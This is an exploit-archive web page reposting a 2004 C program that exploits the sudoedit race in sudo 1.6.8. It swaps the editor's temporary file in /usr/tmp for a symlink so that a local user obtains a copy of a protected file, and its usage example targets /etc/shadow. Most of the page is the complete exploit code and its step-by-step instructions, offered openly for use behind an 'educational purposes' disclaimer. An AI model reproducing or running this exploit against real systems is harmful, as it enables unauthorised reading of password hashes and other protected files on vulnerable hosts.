首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sudo Local Exploit
来源:www.rosiello.org 作者:Angelo 发布时间:2004-09-22  

Sudo Local Exploit

/*

Copyright © Rosiello Security 2004
http://www.rosiello.org

sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw in exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
were published for educational and didactic purpose only.
The author published this program under the condition
that is not in the intention of the reader to use them
in order to bring to himself or others a profit or to bring
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo rosiello org

*/

#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <dirent.h>


int main( int argc, char *argv[] )
{
char PATH[]="/usr/tmp";
char file[32];
DIR *tmp;
struct dirent *de;
tmp = opendir ( PATH );
int found = 0;

printf( "Copyright © Rosiello Security 2004\n" );
printf( "http://www.rosiello.org\n" );

if( argc!=2 )
{
printf( "USAGE: %s file\n", argv[0] );
return( 0 );
}


while ( (de = readdir ( tmp ))!= NULL )
{
if ( (strstr(de->d_name, "rosiello") != NULL) )
{
if( strlen(de->d_name) > 24 ) return( 0 );
sprintf( file, "%s/%s", PATH, (char *)de->d_name );
remove( file );
if( fork()!=0 )
{
execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
}
wait( );
printf( "Now you can close sudoedit and reopen rosiello!\n" );
found=1;
goto end;

}

}
end:
closedir( tmp );

if( !found )
printf( "File Not Found!\n" );
return( 0 );

}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pigeon Server DoS Exploit
·Windows JPEG Processing Buffer
·Proof Of Concept exploit for h
·Windows JPEG GDI+ Overflow She
·finding hidden modules on 2.6
·Windows JPEG GDI+ Overflow Adm
·Cdrecord Local Exploit (SUID S
·HP-UX本地语言系统格式化串漏洞
·BlackJumboDog FTP Server Buffe
·HP-UX本地语言系统格式化串漏洞E
·Cdrecord Local Root Exploit
·Windows JPEG GDI+ Heap Overflo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved